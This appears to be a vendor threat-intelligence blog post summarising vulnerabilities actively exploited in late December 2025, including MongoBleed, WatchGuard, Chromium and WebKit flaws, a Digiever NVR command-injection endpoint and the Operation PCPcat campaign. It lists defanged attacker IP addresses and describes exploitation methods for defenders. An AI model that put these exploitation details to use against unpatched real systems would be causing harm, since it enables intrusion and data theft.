Focused but Relentless Exploitation in the Closing Week of 2025

The final week of 2025 reflected a more focused but persistent exploitation landscape, with only one new vulnerability added to the CISA KEV catalog - MongoBleed highlighting active abuse of widely deployed database infrastructure. At the same time, continued exploitation was observed against previously listed KEV entries, including the end-of-life Digiever DS-2105 Pro NVR, underscoring how attackers continue to capitalize on unpatched and unsupported systems well beyond their initial disclosure.  

Botnet operators including EnemyBot, Sysrv-K, Andoryu, and Androxgh0st intensified campaigns against exposed cloud services, routers, and web applications by abusing misconfigurations and unpatched systems.  

At the same time, continued activity was observed from Operation PCPcat, the large-scale, highly automated credential theft campaign previously disclosed by the Beelzebub Research Team, which persisted in exploiting Next.js and React2Shell vulnerabilities to compromise cloud-hosted applications at scale.

Key points:

• MongoBleed vulnerability added to the CISA KEV catalog, reflecting recent exploitation activity.
• Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.  
• Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.

Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.

CVE-2025-14174 - Out of Bounds Memory Access Vulnerability in Google Chromium
An Out-of-Bounds Memory Access vulnerability in Google Chromium’s ANGLE graphics layer allowed remote attackers to trigger unauthorized memory access through a crafted HTML page, potentially impacting any Chromium-based browser such as Google Chrome, Microsoft Edge, and Opera. The flaw was initially tracked under Chromium issue ID 466192044, with details about the component and CVE assignment intentionally withheld. Evidence later confirmed that it was exploited as a zero-day in the wild, prompting urgent security responses. Google has issued patches in Chrome versions 143.0.7499.109/.110 for Windows and macOS and 143.0.7499.109 for Linux to mitigate the risk. The vulnerability has since been added to the CISA KEV catalog, underscoring its active exploitation and the need for immediate remediation.

CVE-2025-14733 - Out of Bounds Write Vulnerability in WatchGuard Firebox
An Out-of-Bounds Write vulnerability in WatchGuard Fireware OS allowed unauthenticated remote attackers to achieve arbitrary code execution by targeting the iked process responsible for IKEv2 negotiations on Firebox appliances. The flaw impacted both Mobile User VPN and Branch Office VPN configurations using IKEv2 with dynamic gateway peers, exposing critical perimeter infrastructure. WatchGuard linked active exploitation to IPs 45.95.19[.]50, 51.15.17[.]89, 172.93.107[.]67, and 199.247.7[.]82, released Indicators of Attack for detection, and issued multiple patched versions. The issue has since been added to the CISA KEV catalog, underscoring confirmed in-the-wild abuse.

CVE-2025-14847 - Improper Handling of Length Parameter Inconsistency Vulnerability in MongoDB and MongoDB Server
An Improper Handling of Length Parameter Inconsistency vulnerability in MongoDB and MongoDB Server, code named as MongoBleed, allowed unauthenticated attackers to remotely leak sensitive data from server memory by abusing flaws in the zlib-based message compression and decompression logic. By sending specially crafted compressed network packets, attackers could trigger the server to return uninitialized heap memory, exposing credentials, API keys, cached queries, and other sensitive artifacts without requiring authentication or user interaction. Because zlib compression is enabled by default, the issue impacted a wide range of MongoDB versions across cloud and on-premises deployments, with more than 87,000 potentially vulnerable instances identified globally. The flaw posed heightened risk to internet-exposed databases due to its pre-authentication reachability and low exploitation complexity. MongoDB addressed the issue in updated releases, and the vulnerability was added to the CISA KEV catalog, confirming active exploitation in the wild.

CVE-2025-43529 - Use-After-Free WebKit Vulnerability in Apple Multiple Products
A Use-After-Free vulnerability in Apple's WebKit engine affected multiple products, including iOS, iPadOS, macOS Tahoe, tvOS, watchOS, visionOS, and Safari, and allowed remote code execution when processing maliciously crafted web content. Apple confirmed that the flaw discovered by Google’s Threat Analysis Group impacted any HTML parser relying on WebKit, extending risk beyond native Apple platforms to third-party products embedding WebKit. Although technical details were withheld, Apple acknowledged that CVE-2025-43529 and CVE-2025-14174 may have been exploited in an extremely sophisticated, targeted spyware campaign against individuals on versions of iOS prior to iOS 26. The vulnerability has been resolved in iOS/iPadOS 26.2, iOS/iPadOS 18.7.3, macOS Tahoe 26.2, tvOS 26.2, watchOS 26.2, visionOS 26.2, and Safari 26.2. It was recently added to the CISA KEV catalog, following confirmation of in-the-wild exploitation.

CVE-2023-52163 - Missing Authorization Vulnerability in Digiever DS-2105 Pro
A Missing Authorization vulnerability in the DigiEver DS-2105 Pro NVR allowed attackers to perform command injection via the time_tzsetup.cgi endpoint, leading to remote code execution. The device, widely used in surveillance environments for managing IP camera feeds, had reached end-of-life and was no longer supported by the vendor, leaving no official patch available. Although exploitation required an authenticated session, attackers were observed abusing weak controls to deploy malware and compromise exposed systems. The flaw has since been added to the CISA KEV catalog, prompting guidance to avoid internet exposure and rotate default credentials immediately.

Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.

Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets, with payloads indicative of botnet activity, such as using wget commands with specific IP addresses, highlighting ongoing automated exploitation campaigns.

Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analysed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.

Emergence of Operation PCPcat

Beelzebub Research Team reported the discovery of "Operation PCPcat", a highly automated and efficient credential theft campaign, that weaponized vulnerabilities in the Next.js and React frameworks to compromise cloud-hosted web applications at scale. Identified through a Docker honeypot, the operation exploited CVE-2025-29927 and CVE-2025-55182 to breach 59,128 servers in less than 48 hours, demonstrating an unusually high success rate compared to typical mass-scanning campaigns. The activity reflected precision targeting rather than opportunistic “spray and pray” attacks, underscoring the campaign’s operational maturity and impact. Organizations operating public-facing Next.js or React services were urged to apply patches immediately, block the command-and-control address 67.217.57(.)240, and rotate any credentials exposed through environment files to contain potential compromise.

PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.

Taken together, this week’s observations illustrated how threat actors continued to combine abuse of legacy, end-of-life systems with rapid weaponization of newly disclosed application flaws to expand their impact. The increasingly narrow window between disclosure and active exploitation underscored the need for continuous visibility and faster response across complex environments. Loginsoft Vulnerability Intelligence (LOVI) supports this shift by continuously tracking exploitation trends, highlighting high-risk exposures, and enabling timely action before threats escalate. Through real-time intelligence and contextual insights, LOVI helps organizations stay resilient against both long-standing and emerging attack vectors.

FAQs:

1) What is React2Shell and why is it appealing for threat actors?

A) React2Shell refers to CVE-2025-55182, a critical RCE flaw in React Server Components that allows unauthenticated attackers to run arbitrary code on vulnerable servers. Its appeal lies in the zero-authentication attack surface, widespread adoption of React frameworks, and the ability to rapidly gain initial access for malware deployment, persistence, or botnet expansion.

2) How does LOVI help organizations manage vulnerabilities effectively?

A) Loginsoft Vulnerability Intelligence empowers you to efficiently prioritize and respond to potential vulnerabilities by focusing on those actively exploited in the wild. LOVI correlates vulnerability data with real-world threat activity to reduce noise and improve decision-making. This approach enables faster remediation and stronger security posture.

3) What is MongoDB?

A) MongoDB is a widely used NoSQL database that stores data in flexible BSON (Binary JSON) documents instead of fixed tables. It is designed to handle large volumes of structured and unstructured data with high performance. MongoDB is commonly deployed across cloud and on-premises environments to support scalable, highly available, and distributed applications.

4) What is Cytellite?

A) Cytellite is a Loginsoft security intelligence platform that provides real-time visibility into emerging threats through a global sensor network. It delivers actionable IP intelligence to help organizations detect, analyze, and respond to attacks quickly. By correlating threat data with live activity, Cytellite strengthens resilience across dynamic threat landscapes.